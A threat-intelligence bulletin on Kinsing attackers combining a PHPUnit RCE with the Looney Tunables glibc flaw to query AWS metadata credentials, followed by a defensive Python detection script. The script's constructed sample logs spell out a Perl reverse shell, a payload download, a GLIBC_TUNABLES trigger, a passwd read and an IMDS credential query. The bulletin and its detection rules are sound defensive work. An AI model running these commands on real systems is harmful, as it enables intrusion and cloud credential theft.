2023-11-16

Kinsing Attackers Experiment with "Looney Tunables" Exploit for Cloud Compromise

Level: Tactical | Source: AquaSec & BleepingComputer | Global

Threat actors associated with the Kinsing malware have been observed exploiting CVE-2023-4911 (aka Looney Tunables), a local privilege escalation vulnerability in the GNU C Library's dynamic loader (ld.so) that is triggered through the GLIBC_TUNABLES environment variable, to obtain credentials from cloud environments. In a report authored by Assaf Morag of Aqua Security, the campaign is attributed to Kinsing with "100%" certainty; the supporting details are being withheld for a future report.

An analysis of the threat actor's activity in AquaSec's honeypots revealed that the attackers gain remote code execution by exploiting a PHPUnit vulnerability (CVE-2017-9841). This allowed them to download and execute a Perl script that opens a reverse shell on port 1337. Morag describes the execution of multiple manual commands exhibiting "extensive trial and error," indicating that the Kinsing attackers were testing their latest attack strategy. These commands ultimately included seven relevant actions, such as querying system context (uname), reading /etc/passwd, attempting to open an interactive shell, creating a directory, and downloading several payloads with wget. These payloads included an exploit script for the Looney Tunables vulnerability and a PHP script leading to a JavaScript web shell.

The script to exploit Looney Tunables was found to be sourced directly from a repository owned by a security researcher, @bl4sty. When notified by BleepingComputer, the researcher confirmed their intention to address this abuse. From their web shell, the threat actors attempted to query the AWS instance metadata service, signaling their ultimate intent to "enumerate the details and credentials associated with the Cloud Service Provider (CSP)." AquaSec noted that this deviates from the threat actor's typical goal, which is to deploy their cryptominer, suggesting that the Kinsing threat actors are expanding their objectives and aiming for more "intense activities."
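The chain summarized above (PHPUnit eval-stdin.php exploitation, payload download by the web-server user, a GLIBC_TUNABLES-based Looney Tunables attempt, and instance-metadata credential enumeration) is detectable from ordinary web access logs and process/command auditing. The following detection script is an added example for this page, not code from the Aqua Security or BleepingComputer reports. It assumes a constructed command-audit line format (`<timestamp> host=<h> user=<u> cmd=<command>`) and a combined access-log format prefixed with the host name; the sample log lines are constructed, not honeypot data. The PHPUnit request path for CVE-2017-9841, the GLIBC_TUNABLES trigger for CVE-2023-4911, and the AWS IMDS address 169.254.169.254 are public facts about those components; the reverse-shell port and the payload-download step come from the summary.

```python
"""
Detection heuristics for the Kinsing activity chain summarized above.
Added example: not the honeypot data or tooling from the Aqua Security report.
Assumed (constructed) log formats:
  access log : "<host> <src_ip> - - [<ts>] \"<METHOD> <path> HTTP/x\" <status> <bytes>"
  command log: "<ts> host=<host> user=<user> cmd=<command line>"
"""
import re
from dataclasses import dataclass

# CVE-2017-9841: RCE via PHPUnit's eval-stdin.php when vendor/ is web-exposed.
PHPUNIT_RCE_PATH = re.compile(r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php", re.I)
# CVE-2023-4911 (Looney Tunables) is triggered through the GLIBC_TUNABLES env var;
# an unprivileged service account setting it on a command line is highly unusual.
GLIBC_TUNABLES = re.compile(r"\bGLIBC_TUNABLES=")
# AWS instance metadata service; the IAM credentials path is what the actor wants.
IMDS_HOST = "169.254.169.254"
IMDS_CRED_PATH = re.compile(r"/latest/meta-data/iam/security-credentials", re.I)
DOWNLOADER = re.compile(r"\b(wget|curl)\b")
REVERSE_SHELL = re.compile(r"\bperl\b.*\b1337\b")  # Perl reverse shell on 1337 (from the report)
WEB_USERS = {"www-data", "apache", "nginx"}  # assumed web-server service accounts

CMD_LINE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")
ACCESS_LINE = re.compile(r'^(?P<host>\S+) (?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    severity: str
    line: str


def scan_access_log(line):
    """Flag requests for PHPUnit's eval-stdin.php (initial access stage)."""
    m = ACCESS_LINE.match(line)
    if not m:
        return []
    if PHPUNIT_RCE_PATH.search(m["path"]):
        return [Finding(m["host"], "phpunit_eval_stdin_request", "high", line)]
    return []


def scan_command(line):
    """Flag post-exploitation commands run on the host (one line may hit several rules)."""
    m = CMD_LINE.match(line)
    if not m:
        return []
    host, user, cmd = m["host"], m["user"], m["cmd"]
    out = []
    if GLIBC_TUNABLES.search(cmd):
        out.append(Finding(host, "glibc_tunables_in_command", "critical", line))
    if REVERSE_SHELL.search(cmd):
        out.append(Finding(host, "perl_reverse_shell_1337", "high", line))
    if user in WEB_USERS and DOWNLOADER.search(cmd):
        out.append(Finding(host, "web_user_downloader", "medium", line))
    if IMDS_HOST in cmd:
        severity = "critical" if IMDS_CRED_PATH.search(cmd) else "high"
        out.append(Finding(host, "imds_query_from_shell", severity, line))
    return out


def scan(lines):
    """Run both scanners over a mixed stream of access-log and command-log lines."""
    findings = []
    for line in lines:
        findings.extend(scan_access_log(line))
        findings.extend(scan_command(line))
    return findings


# Stages that, seen together on one host, reproduce the chain in the report.
CHAIN_STAGES = ("phpunit_eval_stdin_request", "web_user_downloader", "imds_query_from_shell")


def hosts_with_full_chain(findings):
    """Hosts where initial access, payload download and IMDS enumeration all appear."""
    rules_by_host = {}
    for f in findings:
        rules_by_host.setdefault(f.host, set()).add(f.rule)
    return sorted(h for h, rules in rules_by_host.items() if all(s in rules for s in CHAIN_STAGES))


# Constructed sample lines (not real honeypot data). web01 shows the full chain;
# web02 shows a benign root download that must not fire.
SAMPLE_LOGS = [
    'web01 203.0.113.5 - - [15/Nov/2023:10:01:02 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 47',
    'web01 203.0.113.5 - - [15/Nov/2023:10:01:05 +0000] "GET /index.php HTTP/1.1" 200 1024',
    "2023-11-15T10:01:10Z host=web01 user=www-data cmd=perl /tmp/rs.pl 203.0.113.5 1337",
    "2023-11-15T10:01:20Z host=web01 user=www-data cmd=uname -a",
    "2023-11-15T10:01:25Z host=web01 user=www-data cmd=cat /etc/passwd",
    "2023-11-15T10:01:30Z host=web01 user=www-data cmd=mkdir -p /tmp/.x",
    "2023-11-15T10:01:40Z host=web01 user=www-data cmd=wget http://198.51.100.7/exp.sh -O /tmp/.x/exp.sh",
    "2023-11-15T10:02:00Z host=web01 user=www-data cmd=GLIBC_TUNABLES=glibc.malloc.mxfast=... /tmp/.x/exp",
    "2023-11-15T10:03:00Z host=web01 user=www-data cmd=curl http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "2023-11-15T10:05:00Z host=web02 user=root cmd=wget https://example.com/package.tar.gz",
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOGS)
    for f in hits:
        print(f"[{f.severity:8}] {f.host} {f.rule}: {f.line}")
    print("full chain on:", hosts_with_full_chain(SAMPLE_LOGS and hits))
```

The rules are deliberately narrow: uname and reading /etc/passwd are too common to alert on alone, so they are left as context, while GLIBC_TUNABLES on a service account's command line and a shell-originated IMDS credential query are rare enough to page on by themselves. The per-host chain correlation is what turns the noisier "web user ran wget" signal into a confident match for this campaign's pattern.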
